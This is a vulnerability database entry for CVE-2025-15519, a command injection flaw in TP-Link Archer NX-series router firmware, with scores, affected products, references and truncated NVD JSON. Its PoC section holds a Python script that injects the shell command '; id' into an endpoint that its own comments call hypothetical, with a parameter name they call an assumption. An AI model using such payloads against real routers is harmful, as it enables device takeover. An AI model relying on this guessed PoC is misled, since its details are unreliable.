CVE-2025-15519

Description

Improper input handling in a modem-management administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

TP-Link Archer NX200 (特定固件版本)

TP-Link Archer NX210 (特定固件版本)

TP-Link Archer NX500 (特定固件版本)

TP-Link Archer NX600 (特定固件版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2025-15519
# Target: TP-Link Archer NX200, NX210, NX500, NX600
# Requires: Admin privileges

target_ip = "192.168.0.1"
username = "admin"
password = "admin"  # Replace with actual creds

login_url = f"http://{target_ip}/"
exploit_url = f"http://{target_ip}/admin/modem/manage" # Hypothetical vulnerable endpoint

session = requests.Session()

# 1. Authenticate
login_payload = {"username": username, "password": password}
session.post(login_url, data=login_payload)

# 2. Exploit Command Injection
# Payload: ; id (Execute 'id' command)
payload = "; id"

# Assuming the vulnerable parameter is 'cli_cmd'
exploit_payload = {"cli_cmd": payload}

response = session.post(exploit_url, data=exploit_payload)

if response.status_code == 200:
    print("Request sent. Check response for command output.")
else:
    print("Failed to send request.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15519
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15519
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15519/
[4] VulDB https://vuldb.com/cve/CVE-2025-15519
[5] https://www.tp-link.com/en/support/download/archer-nx200/#Firmware
[6] https://www.tp-link.com/en/support/download/archer-nx210/#Firmware
[7] https://www.tp-link.com/en/support/download/archer-nx500/#Firmware
[8] https://www.tp-link.com/en/support/download/archer-nx600/#Firmware
[9] https://www.tp-link.com/us/support/faq/5027/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15519", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T18:16:23.840", "lastModified": "2026-03-31T19:04:48.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input handling in a modem-management administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device."}, {"lang": "es", "value": "Manejo inadecuado de entradas en un comando CLI administrativo de gestión de módem en TP-Link Archer NX200, NX210, NX500 y NX600 permite que una entrada manipulada sea ejecutada como parte de un comando del sistema operativo. Un atacante autenticado con privilegios administrativos puede ejecutar comandos arbitrarios en el sistema operativo, afectando la confidencialidad, integridad y disponibilidad del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "77429691-1193-4480-A64E-E1FB19D6A073"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "58132EDD-47B7-4E46-B280-FE58A920AE43"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "70EF52E9-1D92-4778-99C5-3B76B81681FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "40D78DBB-CAEA-4C2E-B703-2898B73A0A5E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "22EA51B1-332E-48BB-BDBA-09A99ECB942F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA336E76-7910-4780-BCA0-1DA2AA7F9418"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "48125D02-70B1-4448-BB33-4759FF0E3936"}]}, {"operator": "OR", "negate": false, "cpe ... (truncated)